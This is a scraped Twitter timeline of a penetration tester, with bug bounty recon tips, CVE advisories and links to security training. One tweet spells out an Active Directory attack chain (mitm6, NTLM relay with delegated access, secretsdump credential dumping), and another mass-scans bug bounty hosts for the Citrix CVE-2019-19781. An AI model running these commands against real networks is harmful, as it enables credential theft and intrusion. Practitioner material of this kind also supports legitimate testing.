Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @nullenc0de
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @nullenc0de
-
Prikvačeni tweet
*UPDATE* The guide is at 48 pages now. Easy to follow, beginner/intermediate's guide you can keep in your bag or on your PC. No DRM protections, just a plain PDF. If you have purchased it before, log in and download your free updated copy. https://leanpub.com/internal-field-guide …https://twitter.com/nullenc0de/status/1214619251761438722 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Paul Seekamp proslijedio/la je Tweet
Do you have a big file w/ URLs w/ many of them being default pages, wildcards etc? Use
@TomNomNom's get-title hack to grep out common titles: cat urls.txt | get-title -c 300 > titles.txt cat titles.txt | grep -v "PATTERN" | awk -F '[()]' '{print $2}'#bugbountytip#bugbountyHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
If browsing to http://IP:80 responds with "Fastly error: unknown domain:" can you take that over somehow?
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Windows is gonna break your stuff by forcing LDAP Signing and channel binding.
https://support.microsoft.com/en-us/help/4520412/2020-ldap-channel-binding-and-ldap-signing-requirement-for-windows …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
I'm just connecting to modems via Putty like it's 2001!pic.twitter.com/uIUHQCVfvy
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
If some python guru fixed up https://github.com/DanMcInerney/icebreaker … and added the ldap relay attack. You would be the hero of many... Just saying.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
When you see this for mobile apps: P4| $300-$500.pic.twitter.com/xR8c1clmzc
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Paul Seekamp proslijedio/la je Tweet
Here is the link to the SpecterOps Adversary Tactics: PowerShell course material: https://github.com/specterops/at-ps … Enjoy! For information about our current training offerings, information can be found here: https://specterops.io/how-we-help/training-offerings … (4/4)
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Having trouble findings endpoints? Normal tricks failing? Try making a new wordlist by running wayback against the root domain (and all subdomains). Even if it's not in scope! echo http://example.com | waybackurls |cut -d '/' -f4- |sort -u |tee wordlist.txt
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Paul Seekamp proslijedio/la je Tweet
If you're doing the same thing ten times a day, automate it. If you have a regular task and it's eating into your time, automate it. If you have a bunch of noisy data and you're manually filtering through it, automate it. Retyping the same thing? SCRIPT IT AND AUTOMATE IT
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
For all you the defenders working on CVE-2019-19781.
@x1sec made excellent notes on the Citrix analysis.https://github.com/x1sec/x1sec.github.io/blob/master/CVE-2019-19781-DFIR.md …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Interesting. almost every /oauth/token request I have analyzed responds with "Cache-Control: max-age=0, private, must-revalidate". According to RFC-6749 and RFC-6819 the oAuth client should set in client request HTTP headers to "Cache-Control: no-store" and "Pragma: no-cache".
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
January is FULL of chaos. If Citrix isn't your thing, maybe pre-auth RDP RCE is? CVE-2020-0609 (https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0609 …) CVE-2020-0610 (https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0610 …)pic.twitter.com/eG0BdlOAzJ
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Want Free
? Jump on the Citrix wagon!
Pick a program on https://github.com/arkadiyt/bounty-targets-data/blob/master/data/wildcards.txt …
git clone https://github.com/cisagov/check-cve-2019-19781 …
cd check-cve-2019-19781
pip3 install -r requirements.txt
cat hosts.txt | while read url ; do cve-2019-19781 $url ;done > loot.txt 2>&1 cat loot.txt | grep appearHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Big things in 2020! Intro to my Udemy course(s)... Very early stages, but its gonna be fun and hopefully educational
pic.twitter.com/w6hslszrCmHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Paul Seekamp proslijedio/la je Tweet
Windows Command Line cheatsheet (part 2): WMIC - Bookmark this! Saved my day several times
#infosec#pentest#redteam https://www.andreafortuna.org/2017/08/09/windows-command-line-cheatsheet-part-2-wmic/ …pic.twitter.com/PYO6pKAXGhHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Paul Seekamp proslijedio/la je Tweet
For more info about the why, how and how to prevent it, see https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/ …https://twitter.com/nullenc0de/status/1214619251761438722 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
It's 2020 and you have NetBIOS, LLMNR, SMB sign off but WPAD is still on. EWW! mitm6 -i eth0 -d <domain> http://ntlmrelayx.py -t ldaps://<DomainController> -wh attacker-wpad --delegate-access export KRB5CCNAME=<TGS_ccache_file> http://secretsdump.py –k –no-pass <VictimPC>
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
For the people worried about Iran's cyber attacks: - Apply security updates, use MFA. - Employ endpoint detection technology that detects malware and abuse of native system tools. - User Awareness Training. - Maybe talk with a distributed denial of service mitigation vendor.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.